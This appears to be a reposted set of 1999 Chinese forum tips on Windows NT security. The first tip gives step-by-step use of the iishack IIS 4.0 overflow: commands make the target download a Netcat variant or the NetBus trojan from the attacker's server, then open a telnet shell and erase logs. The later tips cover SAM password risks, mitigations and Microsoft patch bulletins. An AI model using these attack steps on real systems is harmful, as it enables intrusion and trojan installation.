NT安全技术Tips

2019-03-23 10:56

NT安全技术Tips之一

关键词：NT, 计算机安全

（原文内容加贴于1999年7月2日CHINA ASP安全技术版） M$的漏洞五花八门，层出不穷

最近Eeye发现的漏洞并写了2个小小的程序

在IIS的NT机器上有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现.IIShack.asm ,利用这个毛病,eEye写了两个程序: iishack.exe ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这个web server的目录下,比如你的web server是:www.mysvr.com 而对方的IIS server是www.xxx.com

则: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意,不要加http://字符!)

上述命令输入后这时你应该可以看到

------(IIS 4.0 remote buffer overflow exploit)----------------- (c) dark spyrit -- barns@eeye.com. http://www.eEye.com

[usage: iishack ]

eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe do not include 'http://' before hosts!

--------------------------------------------------------------- Data sent!

这个时候，对方主机的IIS服务就关闭了??呵呵恐怖8！

然后,再把Netbus等特洛伊木马传到对方机器上去:

iishack www.example.com 80 www.myserver.com/netbus.exe

ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务

ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用.所以可能不一定有效

然后,用Telnet到对方的99或80端口: Telnet www.xxx.com 99 结果是这样:

Microsoft(R) Windows NT(TM)

C:\\>[You have full access to the system, happy browsing :)] C:\\>[Add a scheduled task to restart inetinfo in X minutes] C:\\>[Add a scheduled task to delete ncx.exe in X-1 minutes] C:\\>[Clean up any trace or logs we might have left behind.]

这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出

NT安全技术Tips之二

关键词：NT, 计算机安全

（原文加贴于1999年7月2日CHINA ASP安全技术版）

安全帐户管理 (SAM) 数据库可以由以下用户被复制： Administrator 帐户， Administrator 组中的所有成员，备份操作员，服务器操作员，以及所有具有备份特权的人员。

解释：SAM 数据库的一个备份拷贝能够被某些工具所

利用来破解口令。 NT 在对用户进行身份验证时，只能

达到加密 RSA 的水平。在这种情况下，甚至没有必要使用工具来猜测那些明文口令。能解码 SAM 数据库并

能破解口令的工具有： PWDump 和 NTCrack。实际上， PWDump 的作者还有另一个软件包， PWAudit，它可以跟踪由 PWDump 获取到的任何东西的内容。

减小风险的建议：严格限制 Administrator 组和备份组帐户的成员资格。加强对这些帐户的跟踪，尤其是 Administrator 帐户的登录 (Logon) 失败和注销 (Logoff) 失败。对 SAM 进行的任何权限改变和对其本身的修改进

行审计，并且设置发送一个警告给 Administrator，告知有事件发生。切记要改变缺省权限设置来预防这个漏

洞。

改变 Administrator 帐户的名字，显然可以防止黑客对缺省命名的帐户进行攻击。这个措施可以解决一系列的

安全漏洞。为系统管理员和备份操作员创建特殊帐户。系统管理员在进行特殊任务时必须用这个特殊帐

户注册，然后注销。所有具有 Administrator 和备份特权的帐户绝对不能浏览 Web。所有的帐户只能具有 User 或者 Power User 组的权限。

采用口令过滤器来检测和减少易猜测的口令，例如， PASSPROP (Windows NT Resource Kit 提供)， ScanNT (一个商业口令检测工具软件包)。使用加强的口令不易被猜测。使用最新版本的 Service Pack 可以加强 NT 口令，一个加强的口令必须包含大小写字母，数字，以及特殊字符。使用二级身份验证机制，比如令牌卡 (Token Card)，可提供更强壮的安全解决方案，不过是要米米的哦??

NT安全技术Tips之三

关键词：NT, 计算机安全

（原文加贴于1999年7月2日CHINA ASP安全技术版）

日期 : 1999/05/27 分類 : Microsoft

來源參考 :Microsoft Security Bulletin __ 簡述

_________________________________________________________________ 微軟公布 WIndows NT RAS 與 RRAS 的修正程式，修正使用者取消 \password\

選項時，使用者的 password 仍會被儲存的缺失。 __ 說明

_________________________________________________________________ 1.當客戶端使用 Microsoft RAS 或 RRAS 撥接進入伺服器端，會詢問使用者是否要

儲存密碼 \，這項功能儲存使用者的安全資訊，但卻忽略了使用

者可能取消 \選項。

2.Windows 藉由 ACLs 保護存放於 registry 檔中使用者的安全資訊，包括 password

，而 ACLs 只允許管理者與有權限的使用者能存取該資訊，Windows NT 4.0 Service

Pack 4 另外提供以 SYSKEY 這個 registry 項目存放加密過的密碼資料。

3.當使用者取消 \選項時， registry 中所儲存的安全資訊並不會消失。微軟公布修正程式，修正此項系統缺失，並要求使用 RAS 或 RRAS 的使用者

必須更新程式。 __ 影響平台

_____________________________________________________________ 1.Microsoft Windows NT Workstation 4.0

2.Microsoft Windows NT Server 4.0

3.Microsoft Windows NT Server 4.0, 企業版 __ 修正方式

_____________________________________________________________ 請根據使用 RAS 或 RRAS ，至下列網址取得更新程式： - RAS:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public /fixes/usa/nt40/Hotfixes-PostSP5/RASPassword-fix/ - RRAS:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public /fixes/usa/nt40/Hotfixes-PostSP5/RRASPassword-fix/ __ 影響結果

_____________________________________________________________ 可能會洩漏使用者的安全性資訊

Microsoft 發佈有關 CSRSS Worker Thread Exhaustion 安全性漏洞的修正程式。 -- 說明---------------------------------------------------------------

1. 在 CSRSS.EXE 的執行過程中，如果讓所有執行程序都在等待使用者的輸入動作

，這時候系統無法再繼續對其他需求提供服務，進而造成系統停擺，如果使用者

開始輸入，則執行程序會恢復正常。

2. 本修正程式用來確保最後一個 CSRSS 的 worker thread 並不需要使用者的輸入

動作，即可提供服務，藉此終止此項安全性弱點。 3. 更多訊息請參考以下網址：

http://support.microsoft.com/support/bulletins/ms99-021faq.asp. http://support.microsoft.com/support/kb/articles/q231/3/23.asp. http://www.microsoft.com/security/default.asp.

-- 影響平台 ---------------------------------------------------------- - Microsoft Windows NT 4.0 Workstation - Microsoft Windows NT 4.0 Server

- Microsoft Windows NT 4.0 Server, Enterprise Edition.

-- 修正方式 ---------------------------------------------------------- 修正程式可以從以下網址獲得：

ftp://ftp.microsoft.com/bussys/winnt/\\

winnt-public/fixes/usa/nt40/Hotfixes-PostSP5/CSRSS-fix/

注意：以上網址為了閱讀方便，已經分成兩行。請自行從\處將兩行接起。 -- 影響結果-----------------------------------------------------------

Denial of Service attack.

Microsoft 發佈有關 malformed LSA request 安全性漏洞的修正程式。 -- 說明---------------------------------------------------------------

1. Windows NT 提供一項名為 LSA(Local Security Authority) 的 API，可以有系統的管理使用者的權限等級，功能包括查詢使用者名稱，修改等級，更換安全性政策以及程式的認證等。

2. 某些 API 所採用的方法無法正常處理不正確的參數形態，因此可能造成 DoS 形

式的攻擊行為，因此受到攻擊的 service 需要重新啟動，但是並不能從攻擊 LSA

取得執行其他未獲許可的 service 的能力。

-- 影響平台 ---------------------------------------------------------- - Microsoft Windows NT 4.0 Workstation - Microsoft Windows NT 4.0 Server

- Microsoft Windows NT 4.0 Server, Terminal Server Edition, 4.0 -- 修正方式 ---------------------------------------------------------- 修正程式可以從以下網址獲得：

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa\\ /NT40/hotfixes-postSP5/LSA3-fix/

注意：以上網址為了閱讀方便，已經分成兩行。請自行從\處將兩行接起。 -- 影響結果----------------------------------------------------------- Denial of Service attack.

NT安全技术Tips之四

关键词：NT, 计算机安全

（原文加贴于1999年7月4日CHINA ASP安全技术版）

特洛伊木马 (Trojan Horses) 和病毒，可能依靠缺省权利作 SAM 的备份，获取访问 SAM 中的口令信

息，或者通过访问紧急修复盘 ERD 的更新盘。

解释：特洛伊木马 (Trojan Horses) 和病毒，可以由以下各组中的任何成员在用缺省权限作备份时执行 (缺省

地，它们包括： Administrator 管理员， Administrator 组成

员，备份操作员，服务器操作员，以及具有备份特权

共6页:

NT安全技术Tips.doc 将本文的Word文档下载到电脑下载失败或者文档不完整，请联系客服人员解决！

下载这篇word文档